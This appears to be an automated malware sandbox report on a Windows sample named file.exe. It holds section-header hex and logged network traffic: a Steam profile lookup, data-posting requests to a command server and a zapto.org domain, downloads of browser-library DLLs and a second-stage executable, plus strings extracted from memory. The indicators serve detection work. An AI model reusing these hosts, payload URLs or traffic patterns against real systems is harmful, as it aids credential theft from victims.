00 00 00 00 00 00 00 90 9a 00 9c 7f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9a 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 74 99 00 00 13 00 00 00 c0 99 00 0c 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 c1 8b 00 00 10 00 00 00 c2 8b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 7d 0b 00 00 e0 8b 00 00 7e 0b 00 00 c6 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c f1 01 00 00 60 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 22 50 00 00 00 60 99 00 00 52 00 00 00 44 97 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 0c 91 00 00 00 c0 99 00 00 92 00 00 00 96 97 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 99 00 00 00 00 60 9a 00 00 02 00 00 00 28 98 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 e4 01 00 00 00 70 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 80 9a 00 00 02 00 00 00 2a 98 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 7f 07 00 00 90 9a 00 00 80 07 00 00 2c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 9c c9 06 00 00 10 a2 00 00 ca 06 00 00 ac 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.192.247.89 23.192.247.89
Source: Joe Sandbox View	IP Address: 77.91.101.71 77.91.101.71

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 7901Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 2673Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00405010

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7847438767.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 198.46.178.145Cache-Control: no-cache

Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://127.0.0.1:8118
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exe
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://198.46.178.145/7847438767.exenderbird
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.FBGDHJKFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.KFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.orgJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zaptoJKFHJ
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
